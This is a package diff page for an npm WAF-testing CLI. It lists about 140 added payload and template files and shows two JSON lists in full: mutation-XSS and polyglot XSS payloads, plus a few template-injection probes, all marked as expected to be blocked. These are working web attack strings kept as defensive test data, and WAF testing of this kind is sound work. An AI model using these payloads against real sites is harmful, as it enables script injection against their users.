npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/xss/mutation.json ADDED Viewed

@@ -0,0 +1,263 @@
+[
+  {
+      "id": "XSS-MXSS-080",
+      "payload": "<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">",
+      "tags": [
+        "mutation",
+        "noscript",
+        "attribute-escape",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via noscript attribute mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-081",
+      "payload": "<svg><style><img src=x onerror=alert(1)></style></svg>",
+      "tags": [
+        "mutation",
+        "svg",
+        "style"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via SVG style element mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-082",
+      "payload": "<math><mtext><table><mglyph><style><!--</style><img title=\"--><img src=x onerror=alert(1)>\">",
+      "tags": [
+        "mutation",
+        "mathml",
+        "table"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via MathML table mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-083",
+      "payload": "<form><math><mtext></form><form><mglyph><style></math><img src=x onerror=alert(1)>",
+      "tags": [
+        "mutation",
+        "form",
+        "mathml"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via form/MathML namespace confusion",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-084",
+      "payload": "<svg><foreignObject><body><img src=x onerror=alert(1)></foreignObject></svg>",
+      "tags": [
+        "mutation",
+        "foreignObject",
+        "namespace"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via foreignObject namespace switch",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-085",
+      "payload": "<div><style><xss id=\"</style><img src=x onerror=alert(1)>\"></div>",
+      "tags": [
+        "mutation",
+        "style",
+        "attribute-escape"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via style tag attribute escape",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-086",
+      "payload": "<listing><img src=x onerror=alert(1)></listing>",
+      "tags": [
+        "mutation",
+        "listing",
+        "legacy"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "mXSS via deprecated listing element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-087",
+      "payload": "<xmp><img src=x onerror=alert(1)></xmp>",
+      "tags": [
+        "mutation",
+        "xmp",
+        "legacy"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "mXSS via deprecated xmp element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-088",
+      "payload": "<svg><desc><![CDATA[</desc><img src=x onerror=alert(1)>]]></svg>",
+      "tags": [
+        "mutation",
+        "cdata",
+        "svg"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via CDATA mutation in SVG",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-089",
+      "payload": "<svg><title><iframe onload=alert(1)></title></svg>",
+      "tags": [
+        "mutation",
+        "svg",
+        "title"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via SVG title element mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-090",
+      "payload": "<table><math><select><mi><select><mi><select><mi><select><img src=x onerror=alert(1)>",
+      "tags": [
+        "mutation",
+        "nested",
+        "select"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via deeply nested select/MathML mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-091",
+      "payload": "<svg><style>*{background:url(\"</style><img src=x onerror=alert(1)\">\"}</style></svg>",
+      "tags": [
+        "mutation",
+        "css",
+        "url"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via CSS URL mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-092",
+      "payload": "<img alt=\"<x>\" src=x onerror=alert(1)>",
+      "tags": [
+        "mutation",
+        "attribute",
+        "entity"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via attribute entity mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-093",
+      "payload": "<svg><animate attributeName=href from=javascript:alert(1) to=1 />",
+      "tags": [
+        "mutation",
+        "animate",
+        "href"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via SVG animate attributeName mutation",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-094",
+      "payload": "<plaintext><script>alert(1)</script>",
+      "tags": [
+        "mutation",
+        "plaintext",
+        "legacy"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "mXSS via plaintext element (stops parsing)",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-095",
+      "payload": "<isindex type=image src=x onerror=alert(1)>",
+      "tags": [
+        "mutation",
+        "isindex",
+        "deprecated"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "mXSS via deprecated isindex element",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-096",
+      "payload": "<math><mi xlink:href=\"javascript:alert(1)\">click</mi></math>",
+      "tags": [
+        "mutation",
+        "xlink",
+        "namespace"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via XLink namespace in MathML",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-097",
+      "payload": "<svg><use href=\"data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x\" /></svg>",
+      "tags": [
+        "mutation",
+        "use",
+        "data-uri"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "mXSS via SVG use element with data URI",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-098",
+      "payload": "<img src=\"javascript:alert(1)\" onerror=\"this.src='javascript:alert(2)'\">",
+      "tags": [
+        "mutation",
+        "double-trigger",
+        "onerror"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS double trigger via src mutation in onerror",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-MXSS-099",
+      "payload": "<form><button formaction=javascript:alert(1)>Click</button></form>",
+      "tags": [
+        "mutation",
+        "formaction",
+        "sanitizer-bypass"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "mXSS via formaction sanitizer bypass",
+      "category": "XSS"
+  }
+]

package/payloads/community/xss/polyglots.json ADDED Viewed

@@ -0,0 +1,371 @@
+[
+  {
+      "id": "XSS-POLY-010",
+      "payload": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//\\x3e",
+      "tags": ["polyglot", "ultimate", "multi-context"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Ultimate XSS polyglot - works in 20+ contexts",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-011",
+      "payload": "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
+      "tags": ["polyglot", "multi-context", "advanced"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Breaks title, style, textarea, script, xmp contexts",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-012",
+      "payload": "'\"><img src=x onerror=alert(1)//>",
+      "tags": ["polyglot", "attribute", "quick"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Escapes single and double quote attribute contexts",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-013",
+      "payload": "\"'><script>alert(1)</script>",
+      "tags": ["polyglot", "script", "attribute"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Attribute escape with script injection",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-014",
+      "payload": "'-alert(1)-'",
+      "tags": ["polyglot", "string-context", "minimal"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Works in JS string context with subtraction",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-015",
+      "payload": "\\'-alert(1)//",
+      "tags": ["polyglot", "escape", "string"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Backslash escape bypass",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-016",
+      "payload": "</script><svg/onload=alert(1)>",
+      "tags": ["polyglot", "script-escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Script block escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-017",
+      "payload": "*/</script><script>alert(1)</script>/*",
+      "tags": ["polyglot", "comment", "script"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Comment and script escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-018",
+      "payload": "\";alert(1)//",
+      "tags": ["polyglot", "attribute", "string"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Attribute value escape with comment",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-019",
+      "payload": "'-alert(1)+'",
+      "tags": ["polyglot", "string", "concatenation"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "String concatenation context",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-020",
+      "payload": "</title><script>alert(1)</script><title>",
+      "tags": ["polyglot", "title", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Title tag polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-021",
+      "payload": "</textarea><script>alert(1)</script><textarea>",
+      "tags": ["polyglot", "textarea", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Textarea escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-022",
+      "payload": "</style><script>alert(1)</script><style>",
+      "tags": ["polyglot", "style", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Style tag polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-023",
+      "payload": "</noscript><script>alert(1)</script><noscript>",
+      "tags": ["polyglot", "noscript", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Noscript escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-024",
+      "payload": "x]><script>alert(1)</script>",
+      "tags": ["polyglot", "processing-instruction"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Processing instruction escape",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-025",
+      "payload": "--><script>alert(1)</script><!--",
+      "tags": ["polyglot", "comment", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "HTML comment polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-026",
+      "payload": "]]><script>alert(1)</script><![CDATA[",
+      "tags": ["polyglot", "cdata", "xml"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "CDATA escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-027",
+      "payload": "%3Cscript%3Ealert(1)%3C/script%3E",
+      "tags": ["polyglot", "url-encoded"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "URL-encoded script polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-028",
+      "payload": "&lt;script&gt;alert(1)&lt;/script&gt;",
+      "tags": ["polyglot", "html-entities"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "HTML entity encoded polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-029",
+      "payload": "<img src=\"x\" onerror=\"alert(1)\">",
+      "tags": ["polyglot", "img", "standard"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Standard img onerror polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-030",
+      "payload": "<svg><script>alert(1)</script></svg>",
+      "tags": ["polyglot", "svg", "script"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "SVG with script polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-031",
+      "payload": "<math><maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(1)\">CLICKME</maction></math>",
+      "tags": ["polyglot", "mathml", "advanced"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "MathML XSS polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-032",
+      "payload": "<xmp><p title=\"</xmp><script>alert(1)</script>\">",
+      "tags": ["polyglot", "xmp", "escape"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "XMP tag polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-033",
+      "payload": "jaVasCript:alert(1)//';\"--></title></style></textarea></script></xmp>",
+      "tags": ["polyglot", "javascript-proto", "multi"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "JavaScript protocol multi-context polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-034",
+      "payload": "1;alert(1)//';\"--></script></style></title></textarea>",
+      "tags": ["polyglot", "js-context", "multi"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "JS context multi-escape polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-035",
+      "payload": "{{constructor.constructor('alert(1)')()}}",
+      "tags": ["polyglot", "angular", "ssti"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Angular/Vue SSTI polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-036",
+      "payload": "${alert(1)}",
+      "tags": ["polyglot", "template", "es6"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "ES6 template literal injection",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-037",
+      "payload": "#{alert(1)}",
+      "tags": ["polyglot", "ruby", "interpolation"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Ruby string interpolation style",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-038",
+      "payload": "{{7*7}}",
+      "tags": ["polyglot", "ssti", "detection"],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "SSTI detection polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-039",
+      "payload": "${7*7}",
+      "tags": ["polyglot", "ssti", "detection"],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "SSTI/EL detection polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-040",
+      "payload": "<a href=\"javascript:alert(1)\">click</a>",
+      "tags": ["polyglot", "href", "javascript"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "JavaScript in href attribute",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-041",
+      "payload": "<form action=\"javascript:alert(1)\"><input type=submit></form>",
+      "tags": ["polyglot", "form", "action"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Form action JavaScript polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-042",
+      "payload": "<button formaction=\"javascript:alert(1)\">X</button>",
+      "tags": ["polyglot", "formaction", "button"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Button formaction polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-043",
+      "payload": "<input onfocus=\"alert(1)\" autofocus>",
+      "tags": ["polyglot", "autofocus", "onfocus"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Autofocus trigger polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-044",
+      "payload": "<select onfocus=\"alert(1)\" autofocus>",
+      "tags": ["polyglot", "select", "autofocus"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Select autofocus polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-045",
+      "payload": "<textarea onfocus=\"alert(1)\" autofocus>",
+      "tags": ["polyglot", "textarea", "autofocus"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Textarea autofocus polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-046",
+      "payload": "<keygen onfocus=\"alert(1)\" autofocus>",
+      "tags": ["polyglot", "keygen", "deprecated"],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Deprecated keygen autofocus",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-047",
+      "payload": "<video><source onerror=\"alert(1)\">",
+      "tags": ["polyglot", "video", "source"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Video source error polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-048",
+      "payload": "<audio src=x onerror=\"alert(1)\">",
+      "tags": ["polyglot", "audio", "onerror"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Audio tag onerror polyglot",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-049",
+      "payload": "<body/onload=alert(1)>",
+      "tags": ["polyglot", "body", "onload"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Body onload without space",
+      "category": "XSS"
+  },
+  {
+      "id": "XSS-POLY-050",
+      "payload": "<isindex action=\"javascript:alert(1)\" type=submit>",
+      "tags": ["polyglot", "isindex", "deprecated"],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Deprecated isindex polyglot",
+      "category": "XSS"
+  }
+]